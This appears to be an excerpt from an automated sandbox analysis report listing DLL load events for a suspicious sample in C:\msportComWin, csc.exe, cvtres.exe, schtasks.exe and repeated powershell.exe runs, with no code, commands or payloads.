                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: version.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: version.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
